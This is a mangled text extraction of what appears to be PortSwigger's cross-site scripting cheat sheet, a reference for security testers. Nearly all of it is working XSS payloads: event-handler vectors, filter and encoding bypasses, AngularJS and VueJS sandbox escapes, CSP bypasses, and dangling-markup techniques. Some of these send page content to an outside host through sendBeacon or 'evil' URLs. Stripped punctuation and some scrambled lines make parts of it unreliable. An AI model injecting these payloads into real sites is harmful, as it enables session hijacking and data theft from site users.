GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
onfocusout
Fires when an element loses focus lta onfocusout=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility
onhashchange
Fires if the hash changes ltbody onhashchange=alert(1)gtCompatibility
onload
Fires when the element is loaded ltbody onload=alert(1)gtCompatibility
onloadeddata
Fires when the first frame is loaded ltaudio onloadeddata=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onloadedmetadata
Fires when the meta data is loaded ltaudio autoplay onloadedmetadata=alert(1)gt ltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onloadend
Fires when the element finishes loading ltimage src=validimagepng onloadend=alert(1)gtCompatibility
onloadstart
Fires when the element begins to load ltimage src=validimagepng onloadstart=alert(1)gtCompatibility
onmessage
Fires when message event is receivedfrom a postMessage call
ltbody onmessage=alert(1)gtCompatibility
onpageshow
Fires when the page is shown ltbody onpageshow=alert(1)gtCompatibility
onplay
Fires when the resource is played ltaudio autoplay onplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onplaying
Fires the resource is playing ltaudio autoplay onplaying=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpopstate
Fires when the history changes ltbody onpopstate=alert(1)gtCompatibility
onprogress
Fires when the videoaudio beginsdownloading
ltaudio controls onprogress=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt
Compatibility
onreadystatechange
Fires when the ready state changes ltapplet onreadystatechange=alert(1)gtltappletgtCompatibility
onrepeat
Fires when a svg animation repeats ltsvggtltanimate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 gtCompatibility
onresize
Fires when the window is resized ltbody onresize=alert(1)gtCompatibility
onscroll
Fires when the page scrolls ltbody onscroll=alert(1)gtltdiv style=height1000pxgtltdivgtltdiv id=xgtltdivgtCompatibility
onstart
Fires when the marquee starts ltmarquee onstart=alert(1)gtXSSltmarqueegtCompatibility
ontimeupdate
Fires when the timeline is changed ltaudio controls autoplay ontimeupdate=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
ontoggle
Fires when the details tag is expanded ltdetails ontoggle=alert(1) opengttestltdetailsgtCompatibility
ontransitioncancel
Fires when a CSS transition cancels ltstylegttarget color redltstylegtltxss id=x style=transitioncolor 10s ontransitioncancel=alert(1)gtltxssgt
Compatibility
ontransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionend=alert(1)gtltxssgt
Compatibility
ontransitionrun
Fires when a CSS transition begins ltstylegttarget transform rotate(180deg)ltstylegtltxss id=x style=transitiontransform 2s ontransitionrun=alert(1)gtltxssgt
Compatibility
ontransitionstart
Fires when a CSS transition starts ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionstart=alert(1)gtltxssgt
Compatibility
onunhandledrejection
Fires when a promise isnt handled ltbody onunhandledrejection=alert(1)gtltscriptgtfetch(xyz)ltscriptgtCompatibility
onunload
Fires when the page is unloaded ltbody onunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onwaiting
Fires when while waiting for the data ltvideo autoplay controls onwaiting=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt
Compatibility
onwebkitanimationend
Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationend=alert(1)gtltxssgt
Compatibility
onwebkitanimationiteration
Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onwebkitanimationiteration=alert(1)gtltxssgt
Compatibility
onwebkitanimationstart
Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationstart=alert(1)gtltxssgt
Compatibility
onwebkittransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s onwebkittransitionend=alert(1)gtltxssgt
Compatibility
Event handlers that do require user interaction
Event Description Code
onauxclick
Fires when right clicking or using themiddle button of the mouse
ltinput onauxclick=alert(1)gtCompatibility
onbeforecopy
Requires you copy a piece of text lta onbeforecopy=alert(1) contenteditablegttestltagtCompatibility
onbeforecut
Requires you cut a piece of text lta onbeforecut=alert(1) contenteditablegttestltagtCompatibility
onbeforepaste
Requires you paste a piece of text lta onbeforepaste=alert(1) contenteditablegttestltagtCompatibility
onchange
Requires as change of value ltinput onchange=alert(1) value=xssgtCompatibility
onclick
Requires a click of the element ltxss onclick=alert(1)gttestltxssgtCompatibility
onclose
Fires when a dialog is closed ltdialog open onclose=alert(1)gtltform method=dialoggtltbuttongtXSSltbuttongtltformgt
Compatibility
oncontextmenu
Triggered when right clicking to show thecontext menu
ltxss oncontextmenu=alert(1)gttestltxssgtCompatibility
oncopy
Requires you copy a piece of text ltxss oncopy=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
oncut
Requires you cut a piece of text ltxss oncut=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
ondblclick
Triggered when double clicking theelement
ltxss ondblclick=alert(1) autofocus tabindex=1gttestltxssgtCompatibility
ondrag
Triggered dragging the element ltxss draggable=true ondrag=alert(1)gttestltxssgtCompatibility
ondragend
Triggered dragging is finished on theelement
ltxss draggable=true ondragend=alert(1)gttestltxssgtCompatibility
ondragenter
Requires a mouse drag ltxss draggable=true ondragenter=alert(1)gttestltxssgtCompatibility
ondragleave
Requires a mouse drag ltxss draggable=true ondragleave=alert(1)gttestltxssgtCompatibility
ondragover
Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
ondragstart
Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility
ondrop
Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
onfullscreenchange
Fires when a video changes full screenstatus
ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
oninput
Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility
oninvalid
Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute
ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility
onkeydown
Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility
onkeypress
Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility
onkeyup
Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility
onmousedown
Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility
onmouseenter
Triggered when the mouse is hoveredover the element
ltxss onmouseenter=alert(1)gttestltxssgtCompatibility
onmouseleave
Triggered when the mouse is movedaway from the element
ltxss onmouseleave=alert(1)gttestltxssgtCompatibility
onmousemove
Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility
onmouseout
Triggered when the mouse is movedaway from the element
ltxss onmouseout=alert(1)gttestltxssgtCompatibility
onmouseover
Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility
onmouseup
Triggered when the mouse button isreleased
ltxss onmouseup=alert(1)gttestltxssgtCompatibility
onmousewheel
Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility
onmozfullscreenchange
Fires when a video changes full screenstatus
ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
onpagehide
Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onpaste
Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility
onpause
Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpointerdown
Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility
onpointerenter
Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility
onpointerleave
Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility
onpointermove
Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility
onpointerout
Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility
onpointerover
Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility
onpointerrawupdate
Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility
onpointerup
Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility
onreset
Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility
onsearch
Fires when a form is submitted and theinput has a type attribute of search
ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
